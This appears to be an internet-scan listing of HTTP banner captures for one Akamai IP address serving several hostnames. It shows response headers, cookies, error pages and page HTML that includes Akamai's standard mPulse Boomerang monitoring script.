<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEv
Open service 23.36.162.70:443 · emp-retaildemousa-uss4.draftkingstest.com
2026-01-02 08:33
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dbc01e9641aeff"
Last-Modified: Thu, 08 May 2025 13:39:14 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 511 0 pmb=mRUM,1
Expires: Fri, 02 Jan 2026 08:33:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 02 Jan 2026 08:33:21 GMT
Content-Length: 5292
Connection: close
Set-Cookie: GCLB=CK7w6Kz0jM3JzQEQAw; path=/; HttpOnly; expires=Fri, 02-Jan-2026 08:38:21 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=251
Server-Timing: origin; dur=21
Server-Timing: ak_p; desc="1767342801276_388276230_2092468686_27117_9685_0_51_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons"/><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEvent)window.attachEvent("onload",a)}}(),"".length>0)if(e&&"performance"in e&&e.performance&&"function"==typeof e.performance.setResourceTimingBufferSize)e.performance.setResourceTimingBufferSize();!function(){if(BOOMR=e.BOOMR||{},BOOMR.plugins=BOOMR.plugins||{},!BOOMR.plugins.AK){var n=""=="true"?1:0,t="",a="zzirqsqxesrem2kxqliq-f-6fde2d567-clientnsv4-s.akamaihd.net",i="false"=="true"?2:1,o={"ak.v":"39","ak.cp":"1286861","ak.ai":parseInt("983061",10),"ak.ol":"0","ak.cr":0,"ak.ipv":4,"ak.proto":"http/1.1","ak.rid":"7cb889ce","ak.r":40717,"ak.a2":n,"ak.m":"","ak.n":"essl","ak.bpcip":"206.81.24.0","ak.cport":45796,"ak.gh":"23.36.160.6","ak.quicv":"","ak.tlsv":"tls1.3","ak.0rtt":"","ak.0rtt.ed":"","ak.csrc":"-","ak.acc":"bbr","ak.t":"1767342801","ak.ak":"hOBiQwZUYzCg5VSAfCLimQ==X9gC1JYd5BIYVECEv13tJfJkVCXsQKR4DVZkiQmyHxnXEJWBAoz437sgQ/QFb5rjcy7v3f6XMx6q4HP5DAHlIzcRIqfzkQVY0Z0cw0Ew9oc4A8B8zYiH6Y65b13DvHYp81DL0Kxz
Open service 23.36.162.70:443 · www.medplusmart.com
2026-01-02 01:30
HTTP/1.1 403 Forbidden Server: Apache Content-Security-Policy: frame-ancestors https://www.medplusindia.com; Feature-Policy: fullscreen 'none'; microphone 'none' X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: same-origin Content-Type: text/html; charset=iso-8859-1 X-Akamai-Transformed: 0 - 0 - Date: Fri, 02 Jan 2026 01:30:42 GMT Connection: close Set-Cookie: _abck=033AC1392ACDDD12B33A7BE056E11E23~-1~YAAQC6AkFzbxvCybAQAAeA9UfA9xJSXi1IZpfAshYm/dir9P2Pq2z941tX9TEdX29v3RJ665almXNn5IaSQ2jN25oK1EmgdxmGtXmAESpKZ83LVy98/cefIjMS7EpgSbCgnqTqa3Sb9hC0oaj/V2ihJ91UlHcB/raW+aiKyWN+le75EUFa0eRmrAZfzLfTjsQqseGG2DvZsM783NUfA3goPxdBEedobK+Ac/6ntaIOnXUuq0hHKVHrGGNtwIZhrs3kujAtas/Qah7AFJ13Q0Z1T4VO1lxnex7aWlykkSmOBq/o2ErB3B5DjaxBbZCeLzrbfArMnctXK6YWLAMjHBMmFxhLhvkbndEVDhhYqzu/EOrfnAd++kSaL1IU1wkukpV87tzNxVgLvNsdYyNfOVYSOhUcRLCrNsVAw2mm7ICsE4x1mPpGA0EBV18T0T2MYxlkBMiE/3K+Wlig==~-1~-1~-1~-1~-1; Domain=.medplusmart.com; Path=/; Expires=Sat, 02 Jan 2027 01:30:42 GMT; Max-Age=31536000; Secure Set-Cookie: bm_sz=036552B049B0559007CEF0AFC59FA616~YAAQC6AkFzfxvCybAQAAeA9UfB4TEFb3kEKz3QZYqxVt0wtFNIO0kZMj7wXE+8lX2Uz7yI2KFdMo3cHLxuc1gomV/vrvNU47VKwGAqVDj+Q/nZzipbxR5Wa9idgh6kQoYpQIzJITtSQZcKfiDXQ5bkNSjcQqoG8dqfntC9Tm7R0OxQIagw7+v8AL++MwhMWgdREaTxhpZS1pgwkzz0AfQ+BLG3LdBv1aQoDTdnf1/Kn6VbMDiBQ6f3i19imHPdGI8MsgA3sSiiQ3w1MfObGdmTKXb8r5b76edjsSbK1GuH0UnivJr5ZP7RwY6ZWLtMzA4NuctSVQG46WZj3vxqjHc6EmMG77GoerPN3oxfqj+gMjGHRf~4600374~3748164; Domain=.medplusmart.com; Path=/; Expires=Fri, 02 Jan 2026 05:30:42 GMT; Max-Age=14400 Page title: 403 Forbidden <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <script type="text/javascript" nonce="9e89739e50250b4558d11fe4b3340310" src="/-ZTTN8SR9el9LDaybTrMnjjw/zEDuhJNbJXXhVb/OFIrR2o/ODcY/Yg9WKToB"></script></body></html>
Open service 23.36.162.70:443 · www.krispykreme.jp
2025-12-30 14:11
HTTP/1.1 301 Moved Permanently X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://krispykreme.jp/ Strict-Transport-Security: max-age=31536000; Access-Control-Allow-Origin: * Content-Security-Policy: default-src * 'self' 'unsafe-eval' 'unsafe-inline' gap://ready file:; style-src 'self' 'unsafe-inline' 'unsafe-eval' *.googleapis.com unpkg.com woobox.com www.google-analytics.com *.typekit.net cdn.jsdelivr.net *.form.run; font-src * 'self' 'unsafe-eval' 'unsafe-inline' data:; connect-src * 'self' *.form.run api.form.run; object-src 'self' 'unsafe-eval' 'unsafe-inline'; child-src 'self' youtube.com woobox.com www.google-analytics.com *.youtube.com www.google.com *.form.run; frame-src * 'self' 'unsafe-eval' 'unsafe-inline' youtube.com woobox.com www.google-analytics.com *.youtube.com *.form.run; script-src * 'self' 'unsafe-eval' 'unsafe-inline' maps.googleapis.com www.google.com www.google-analytics.com unpkg.com woobox.com *.form.run sdk.form.run; media-src * 'self' 'unsafe-eval' 'unsafe-inline'; img-src * 'self' filesystem: data: blob: *.form.run; Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Tue, 30 Dec 2025 14:11:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 30 Dec 2025 14:11:53 GMT Connection: close Set-Cookie: mw-wp-form-token=7bfcf509b76e8b21da7f7b7f9d111e09900713e30f178eeed74a842b50fe6019; path=/; secure; HttpOnly Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=908 Server-Timing: origin; dur=599 Alt-Svc: h3=":443"; ma=93600 Server-Timing: ak_p; desc="1767103911985_388276230_1709483868_150622_30320_0_78_-";dur=1
Open service 23.36.162.70:443 · emp-retaildemousa-uss1.draftkingstest.com
2025-12-30 13:40
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dc6d9be98d9561"
Last-Modified: Mon, 15 Dec 2025 08:22:12 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 668 0 pmb=mRUM,1
Expires: Tue, 30 Dec 2025 13:40:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 30 Dec 2025 13:40:06 GMT
Content-Length: 6162
Connection: close
Set-Cookie: GCLB=CNn_x4P-3bGxBxAD; path=/; HttpOnly; expires=Tue, 30-Dec-2025 13:45:06 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=449
Server-Timing: origin; dur=37
Server-Timing: ak_p; desc="1767102005331_388276245_1727305039_48617_15802_150_463_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//fonts.gstatic.com"><link rel="preconnect" href="https://fonts.googleapis.com"/><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/><link rel="preload" href="/settings" as="script"/><link rel="preload" href="/img/logo.png" as="image"/><link rel="preload" href="/img/logo.svg" as="image"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" media="print" onload="this.media='all'"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap" media="print" onload="this.media='all'"/><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap"/></noscript><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title><script defer="defer" src="/runtime.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/vendors.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/main.b3cea4bbe07d177bd7a1.js"></script>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEv
Open service 23.36.162.70:443 · www.medplusmart.com
2025-12-30 09:06
HTTP/1.1 403 Forbidden Server: Apache Content-Security-Policy: frame-ancestors https://www.medplusindia.com; Feature-Policy: fullscreen 'none'; microphone 'none' X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: same-origin Content-Type: text/html; charset=iso-8859-1 X-Akamai-Transformed: 0 - 0 - Date: Tue, 30 Dec 2025 09:06:07 GMT Connection: close Set-Cookie: _abck=A651FE5966D4F3DE49BD44BC54471D30~-1~YAAQBqAkF7fFJSWbAQAA7e+Bbg+2TLzPKojhqTut+4OndyDIKnGe0UOzq1CN4U8lA7YOpr+g/aUIcSYs0UhEaqipntTBsed9EsIP3e7Kv9snKcJeYf6+4/nRlocvihqMihpGWc/WtFZMfKw9KFbxFNKycARd7NvS5BOUcXlFwtoyK6HocUwsO4jOB+FMSwobTCzVmeLe9+SjR/umV37zDNCQrRkhS1er51zqTgwT45+QkvPlGg/ajy0ePk4mtYXIZBC8FeiB6Bti59qUiwXjPUaPXVe3Tgik3JjmIh+tDhIwDTeZ6JAoEBhxEx26WYN1RV21+7PBLloRHRQuLExKA9xOS6OiGjF/p5Q9seVK3d1i2JrLGiJeV2Hd9a9m466kqhbOc58cgPPmbLypz+owHqWkbrjuVXYn8qvodqHvvmsGqSYXsngiqh7UD7q46Hcx0/wq84G2isNG3Q==~-1~-1~-1~-1~-1; Domain=.medplusmart.com; Path=/; Expires=Wed, 30 Dec 2026 09:06:07 GMT; Max-Age=31536000; Secure Set-Cookie: bm_sz=01EAEA3475EFFBAF71A01BAF619C226D~YAAQBqAkF7jFJSWbAQAA7e+Bbh5tPIML1vkCEHKI7CwjvD5TO06BViQZbQFcxyWF+ZIY88M97KbphE5qcR0ZqrIxKOayfLt23RTG3XiI+xp/hx+RUK1znFxcUR43NcKq/g+7Na5liPwiEW7Yv2XSLapZkZ2MVAwGCtZHLuAOYk4HpthHSqkV2eAsgRcVbZ+Xc06oBgysy7I/ZMvD6Esz6zBltgDzsceS5gP7UoO0h4VO/0dgk85OQBP3rAgY+tUDsrjvPtCN9OmFjo0h7auJXXOox1yrBvlZIDP/Pxr4eU+WiZVXnFqcSMHvVX9r90BVUSo7zcTp+LkIATW9RKClD8pjzLl2Tct1wFIU2Eya8+A=~4339012~4405571; Domain=.medplusmart.com; Path=/; Expires=Tue, 30 Dec 2025 13:06:07 GMT; Max-Age=14400 Page title: 403 Forbidden <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <script type="text/javascript" nonce="6f6297679bc2280c6996ea98fc9f794e" src="/BGGtYw/O4/h3/BhgI/STxpLWRs4FAUM/uGONfDLzJV2XStcE/QwozAQ/JzJeMy/kESx0"></script></body></html>
Open service 23.36.162.70:443 · www.krispykreme.jp
2025-12-23 05:21
HTTP/1.1 301 Moved Permanently X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://krispykreme.jp/ Strict-Transport-Security: max-age=31536000; Access-Control-Allow-Origin: * Content-Security-Policy: default-src * 'self' 'unsafe-eval' 'unsafe-inline' gap://ready file:; style-src 'self' 'unsafe-inline' 'unsafe-eval' *.googleapis.com unpkg.com woobox.com www.google-analytics.com *.typekit.net cdn.jsdelivr.net *.form.run; font-src * 'self' 'unsafe-eval' 'unsafe-inline' data:; connect-src * 'self' *.form.run api.form.run; object-src 'self' 'unsafe-eval' 'unsafe-inline'; child-src 'self' youtube.com woobox.com www.google-analytics.com *.youtube.com www.google.com *.form.run; frame-src * 'self' 'unsafe-eval' 'unsafe-inline' youtube.com woobox.com www.google-analytics.com *.youtube.com *.form.run; script-src * 'self' 'unsafe-eval' 'unsafe-inline' maps.googleapis.com www.google.com www.google-analytics.com unpkg.com woobox.com *.form.run sdk.form.run; media-src * 'self' 'unsafe-eval' 'unsafe-inline'; img-src * 'self' filesystem: data: blob: *.form.run; Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Tue, 23 Dec 2025 05:21:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 05:21:31 GMT Connection: close Set-Cookie: mw-wp-form-token=cd06cfaf4f569fdb7df3a67b330e97c1ddf4d1934d1f3b09f53483b7a572f067; path=/; secure; HttpOnly Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=664 Server-Timing: origin; dur=679 Alt-Svc: h3=":443"; ma=93600 Server-Timing: ak_p; desc="1766467290016_388276244_744554647_134317_8602_100_104_-";dur=1
Open service 23.36.162.70:443 · emp-retailexhibitionusa-uss1.draftkingstest.com
2025-12-23 04:30
HTTP/1.1 403 Forbidden Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 407 Expires: Tue, 23 Dec 2025 04:30:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 04:30:45 GMT Connection: close Server-Timing: cdn-cache; desc=HIT Server-Timing: edge; dur=1 Server-Timing: ak_p; desc="1766464244706_388276230_730113454_28_5494_163_330_-";dur=1 Page title: Access Denied <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD><BODY> <H1>Access Denied</H1> You don't have permission to access "http://emp-retailexhibitionusa-uss1.draftkingstest.com/" on this server.<P> Reference #18.6a02417.1766464244.2b84a5ae <P>https://errors.edgesuite.net/18.6a02417.1766464244.2b84a5ae</P> </BODY> </HTML>
Open service 23.36.162.70:443 · emp-retaildemousa-uss1.draftkingstest.com
2025-12-22 12:55
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dc6d9be98d9561"
Last-Modified: Mon, 15 Dec 2025 08:22:12 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 700 0 pmb=mRUM,1
Expires: Mon, 22 Dec 2025 12:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Dec 2025 12:55:25 GMT
Content-Length: 6162
Connection: close
Set-Cookie: GCLB=CIGf5N2m387m6gEQAw; path=/; HttpOnly; expires=Mon, 22-Dec-2025 13:00:25 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=88
Server-Timing: origin; dur=28
Server-Timing: ak_p; desc="1766408125461_388276230_679141822_11614_6716_88_192_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//fonts.gstatic.com"><link rel="preconnect" href="https://fonts.googleapis.com"/><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/><link rel="preload" href="/settings" as="script"/><link rel="preload" href="/img/logo.png" as="image"/><link rel="preload" href="/img/logo.svg" as="image"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" media="print" onload="this.media='all'"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap" media="print" onload="this.media='all'"/><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons&display=swap"/></noscript><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title><script defer="defer" src="/runtime.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/vendors.b3cea4bbe07d177bd7a1.js"></script><script defer="defer" src="/main.b3cea4bbe07d177bd7a1.js"></script>
<script>!function(e){var n="https://s.go-mpulse.net/boomerang/";if("False"=="True")e.BOOMR_config=e.BOOMR_config||{},e.BOOMR_config.PageParams=e.BOOMR_config.PageParams||{},e.BOOMR_config.PageParams.pci=!0,n="https://s2.go-mpulse.net/boomerang/";if(window.BOOMR_API_key="JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM",function(){function e(){if(!r){var e=document.createElement("script");e.id="boomr-scr-as",e.src=window.BOOMR.url,e.async=!0,o.appendChild(e),r=!0}}function t(e){r=!0;var n,t,a,i,d=document,O=window;if(window.BOOMR.snippetMethod=e?"if":"i",t=function(e,n){var t=d.createElement("script");t.id=n||"boomr-if-as",t.src=window.BOOMR.url,BOOMR_lstart=(new Date).getTime(),e=e||d.body,e.appendChild(t)},!window.addEventListener&&window.attachEvent&&navigator.userAgent.match(/MSIE [67]\./))return window.BOOMR.snippetMethod="s",void t(o,"boomr-async");a=document.createElement("IFRAME"),a.src="about:blank",a.title="",a.role="presentation",a.loading="eager",i=(a.frameElement||a).style,i.width=0,i.height=0,i.border=0,i.display="none",o.appendChild(a);try{O=a.contentWindow,d=O.document.open()}catch(_){n=document.domain,a.src="javascript:var d=document.open();d.domain='"+n+"';void 0;",O=a.contentWindow,d=O.document.open()}if(n)d._boomrl=function(){this.domain=n,t()},d.write("<bo"+"dy onload='document._boomrl();'>");else if(O._boomrl=function(){t()},O.addEventListener)O.addEventListener("load",O._boomrl,!1);else if(O.attachEvent)O.attachEvent("onload",O._boomrl);d.close()}function a(e){window.BOOMR_onload=e&&e.timeStamp||(new Date).getTime()}if(!window.BOOMR||!window.BOOMR.version&&!window.BOOMR.snippetExecuted){window.BOOMR=window.BOOMR||{},window.BOOMR.snippetStart=(new Date).getTime(),window.BOOMR.snippetExecuted=!0,window.BOOMR.snippetVersion=14,window.BOOMR.url=n+"JNVG9-ZAD3Z-J6YKD-ZH6TG-FY9GM";var i=document.currentScript||document.getElementsByTagName("script")[0],o=i.parentNode,r=!1,d=document.createElement("link");if(d.relList&&"function"==typeof d.relList.supports&&d.relList.supports("preload")&&"as"in d)window.BOOMR.snippetMethod="p",d.href=window.BOOMR.url,d.rel="preload",d.as="script",d.addEventListener("load",e),d.addEventListener("error",function(){t(!0)}),setTimeout(function(){if(!r)t(!0)},3e3),BOOMR_lstart=(new Date).getTime(),o.appendChild(d);else t(!1);if(window.addEventListener)window.addEventListener("load",a,!1);else if(window.attachEv
Open service 23.36.162.70:443 · emp-retaildemousa-uss4.draftkingstest.com
2025-12-22 10:59
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: W/"1dbc01e9641aeff"
Last-Modified: Thu, 08 May 2025 13:39:14 GMT
Access-Control-Allow-Origin: *
X-Akamai-Transformed: 9 511 0 pmb=mRUM,1
Expires: Mon, 22 Dec 2025 10:59:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Dec 2025 10:59:46 GMT
Content-Length: 5295
Connection: close
Set-Cookie: GCLB=CLe0nIGB74GAYRAD; path=/; HttpOnly; expires=Mon, 22-Dec-2025 11:04:46 GMT
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=126
Server-Timing: origin; dur=19
Server-Timing: ak_p; desc="1766401186587_388276245_735644341_14502_9453_15_55_-";dur=1
Page title: Retail.EMP
<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"/><link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons"/><link rel="shortcut icon" href="/img/favicon.ico"><link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png"><link rel="icon" type="image/png" sizes="192x192" href="/img/android-chrome-192x192.png"><link rel="icon" type="image/png" sizes="512x512" href="/img/android-chrome-512x512.png"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><title>Retail.EMP</title>
